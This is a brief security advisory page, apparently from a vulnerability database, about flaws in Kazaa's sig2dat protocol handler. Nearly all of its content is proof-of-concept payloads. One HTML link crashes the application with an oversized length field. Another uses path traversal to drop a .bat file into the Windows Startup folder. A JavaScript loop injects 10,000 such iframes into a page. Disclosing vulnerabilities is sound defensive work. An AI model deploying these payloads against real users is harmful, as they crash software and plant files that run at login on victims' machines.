|
|
Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
No exploit is required to leverage these issues. The following proof of concepts have been provided: To crash the affected application: <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A> To create arbitrary files: <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A> <script> var i for (i=1;i<10000;i++) { mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All Users /Start Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB% 7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>"; document.write(mylocation); } </script> |
|
Privacy Statement |